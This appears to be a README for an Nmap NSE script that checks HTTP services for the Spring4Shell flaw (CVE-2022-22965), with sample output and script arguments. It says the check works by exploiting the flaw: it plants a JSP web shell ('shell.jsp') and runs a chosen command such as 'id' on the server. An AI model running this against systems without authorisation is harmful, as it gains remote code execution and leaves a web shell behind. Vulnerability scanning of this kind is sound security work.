Share
## https://sploitus.com/exploit?id=CFF7A226-3523-52E0-8A6C-0D0E6A7BEBD6
# Nmap-spring4shell
Log4shell-nmap is an NSE script for detecting Spring4Shell RCE vulnerabilities (CVE-2022-22965) in HTTP services. The script injects the correct payload into the application and then executes the following command on the specified endpoint.

## Vulnerability
See [here](https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/).

## Usage
```
┌──(kali㉿kali)-[~/nmap-spring4shell]
└─$ nmap 127.0.0.1 --script=./spring4shell.nse
(...)
PORT     STATE SERVICE    REASON  VERSION
8080/tcp open  http-proxy syn-ack
| spring4shell: 
|   VULNERABLE:
|   Spring4Shell - Spring Framework RCE via Data Binding on JDK 9+
|     State: VULNERABLE
|     IDs:  CVE:CVE-2022-22965
|     Check results:
|       127.0.0.1:8080/shell.jsp?pwd=j&cmd=id
|     Extra information:
|       TESTED URL: 127.0.0.1:8080
|       COMMAND: id
|       ASSERTION: uid
|     References:
|_      https://vulners.com/cve/CVE-2022-22965
```

## Arguments
We can use several variables in the script. These are as follows:
- `endpoint` - relative url. On `https://bugspace.pl/search/videos` it will be `/search/videos`,
- `command` - command to be run on the server.  The default command is `id`,
- `assertion` - the checked string inside the server response. The default assertion is `uid`,
- `filename` - file name on the server. For more information see [here](https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/). The default name is `shell`.

## Additional data
Tested on application from [here](https://github.com/BobTheShoplifter/Spring4Shell-POC) and [here](https://github.com/reznok/Spring4Shell-POC)

## License
Same as Nmap. See https://nmap.org/book/man-legal.html